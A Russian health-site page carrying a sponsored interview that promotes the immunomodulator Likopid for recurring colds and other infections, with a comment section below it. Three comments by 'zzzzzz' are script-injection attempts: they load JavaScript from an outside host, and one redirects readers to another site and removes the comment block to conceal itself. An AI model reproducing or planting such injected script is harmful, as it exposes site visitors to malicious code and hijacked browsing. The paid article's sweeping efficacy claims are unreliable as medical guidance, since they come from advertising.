Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ликопид в лечении рецидив...  >>  Ликопид в лечении рецидивов ОРВИ и ОРЗ
 
Обратная связь
 

Ликопид в лечении рецидивов ОРВИ и ОРЗ

Размер шрифта
08 апреля 2015 00:00
  • google_analytics: false
  • Нравится

Терапия пациентов, страдающих рецидивирующими заболеваниями верхних дыхательных путей, составляет довольно непростую проблему, поскольку она стоит на стыке нескольких дисциплин и должна решать сразу несколько задач: воздействовать на возбудителя, предотвратить рецидивы и  при этом терапия должна быть максимально безопасной для пациента.

Ликопид в лечении рецидивов ОРВИ и ОРЗ

О вопросах клиники и лечения рецидивирующих ОРВИ мы попросили рассказать профессора кафедры иммунологии, аллергологии и лабораторной диагностики ГБОУ ВПО КубанскогоГМУ Минздрава России, доктора биологических наук Колесникову Наталию Владиславовну

От каких факторов зависит выбор методики лечения рецидивирующих ОРВИ и ОРЗ?

В настоящее время часто рецидивирующие инфекции верхних дыхательных путей трактуются как клинические проявления вторичной иммунной недостаточности. Это означает, что совершенно нормальная при рождении иммунная система в результате каких-то причин начинает давать функциональные сбои.  Поэтому лечение пациентов, страдающих частыми простудными заболеваниями, должно быть патогенетически обоснованным (патогенетическая терапия -  метод лечения, при котором воздействие направлено на подавление одних звеньев механизма развития болезненного процесса и усиление других, что способствует прекращению его развития в излечению), объем терапии должен быть адекватен тяжести заболевания.

Существуют ли устоявшиеся нормы лечения этих заболеваний?

Ликопид в лечении рецидивов ОРВИ и ОРЗ

Условно можно выделить несколько направлений лечения: подбор терапии в соответствии с возбудителем (противогерпетические или противовирусные, антибактериальные или противогрибковые препараты)  и применение иммуномодулирующих препаратов, помогающих «восстановить» ослабленную функцию и справиться с «повторами» ОРЗ и ОРВИ.

Иммуномодуляторы, как и любые лекарственные препараты, требуют вдумчивого подхода и должны назначаться по показаниям, а не для  «укрепления иммунитета». Так, например, для профилактики сезонной заболеваемости иммуномодуляторы показаны пациентам с частыми эпизодами ОРЗ в течение года, включая рецидивирующие синуситы и отиты.

Я бы рекомендовала последнее поколение бактериальных иммуномодуляторов - минимальные биологически активные фрагменты (МБАФ). Почему? Последние открытия в области иммунологии, за которые была присуждена Нобелевская премия в области медицины в 2011 году, помогли нам понять механизм действия иммуномодуляторов микробного происхождения через рецепторы врожденного иммунитета, которые несут большинство клеток крови (которые по совместительству являются клетками иммунной системы) и ткани.

Второй важнейший аспект – безопасность. 

МБАФ, являясь мельчайшим фрагментом стенки бактерий, входит в состав в том числе «полезных» бактерий, которые после окончания их жизненного цикла также подвергаются «утилизации» и ферментативному распаду на мельчайшие «запчасти», т.е. те же самые МБАФ. Вы можете себе представить аллергическую реакцию на собственную «полезную» микрофлору?  Это крайне затруднительно.

В России, Казахстане, Республике Беларусь, Армении, Азербайджане и Молдове зарегистрирован истинный МБАФ, составляющий повторяющийся универсальный фрагмент пептидогликана – ГМДП (Ликопид).

Как действует Ликопид на организм?

В естественных условиях наш организм находится в «тонусе» под влиянием все тех же частей бактерий и МБАФов, которые образуются при отражении атак любых бактерий.

Воздействуя на ключевую молекулярную мишень (рецептор) в иммунной системе, Ликопид, как и другие МБАФы, «имитирует» естественный процесс обнаружения фрагментов пептидогликана микроорганизмов, т.е. действие препарата максимально приближено к естественной иммунорегуляции.

В лечении каких заболеваний эффективно применение Ликопида?

Ликопид 1мг  эффективен в лечении вирусных и грибковых, бактериальных заболеваний с частыми рецидивами в течение года. Это касается: повторяющихся и длительно протекающих заболеваний дыхательного тракта у детей и взрослых, включая профилактический прием этими пациентами в осенне-зимний сезон подъема заболеваемости; гнойно-воспалительных заболеваний кожи, мягких тканей и послеоперационных осложнений; вирусных инфекций (герпесвирусные и папилломавирусные).

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Елена

12 апреля 2015 в 12:08

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:15

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Разрушители иммунитета. Что лишает вас защиты от болезней   Как не заболеть и сэкономить на лекарствах   Аппарат, который вы трогаете каждый день, грязнее туалета!   Диаскинтест – инновационная диагностика туберкулезной инфекции  
08 октября 2012Диагноз «рак легких» ставят по дыханию! 12 ноября 2012Старческие болезни больше не страшны
 
28 сентября 2012Наркоманов больше не будет! 03 сентября 2012Опасный вирус убивает стафилококк, против которого бессильны лекарства!
 

Слайдшоу

1
Что не дает вам уснуть
Самый легкий орган
«Укололся и пошел!»

Тесты

1
Как контролировать бронхиальную астму у детей
Как контролировать бронхиальную астму
Что вы знаете о пневмонии?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.